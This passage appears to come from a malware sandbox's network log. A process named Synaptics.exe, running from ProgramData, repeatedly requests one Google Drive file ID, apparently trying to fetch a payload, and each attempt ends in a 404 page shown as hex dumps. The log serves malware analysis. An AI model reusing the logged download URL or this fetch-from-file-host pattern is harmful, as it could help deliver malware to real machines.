                                                                                                                                                        2024-12-30 10:48:42 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 79 36 4f 6d 7a 75 6d 51 37 64 68 4f 41 39 42 53 56 67 52 50 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="My6OmzumQ7dhOA9BSVgRPA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:42 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        114192.168.2.750145142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:41 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NCOJAr8gyA4S9PkJy8hM9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        115192.168.2.750147142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:41 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9AauJfXA7jWRIXuSuysz6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        116192.168.2.750150142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:41 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:42 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7_S5M_jRT_ho84kNefIPTdX51o5Lsfqgx2nAx8ofb92AXhaROX4z_Y1T6mi1f-b3j2
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lsN1IenBPG81XtBuWg7zJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:42 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:42 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 7a 6d 56 73 42 31 5f 32 51 33 4b 67 4b 4d 56 67 63 72 69 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="MzmVsB1_2Q3KgKMVgcriNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:42 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        117192.168.2.750151142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:42 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:43 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-41-tJwOe98Pqf3bX2r5moQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        118192.168.2.750152142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:42 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:43 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4xGQxMnFAbP_YUDNtRyOkD9FEuCQzll9IT4QbfLROe73IBhdlCY8botG7vx1-rFkzXLTcEkBg
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:43 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Dk3WDjvaYlQ1PqTE0gGqSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:43 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:43 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 52 74 4f 46 75 59 76 36 49 51 42 37 62 57 48 5a 77 74 59 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="jRtOFuYv6IQB7bWHZwtYqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:43 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        119192.168.2.750153142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:42 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:43 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-idipWuU5yGjk2zuMgLvgkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        120192.168.2.750154142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:42 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:43 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4b64374eGQxD2SfvLPd_qNN54rj6FJysXUKR7Ntqv9wppbpiZuExQmpZf88ardkla3
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:43 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-laTNPNx4Ec8EmOBqWuoUHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:43 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
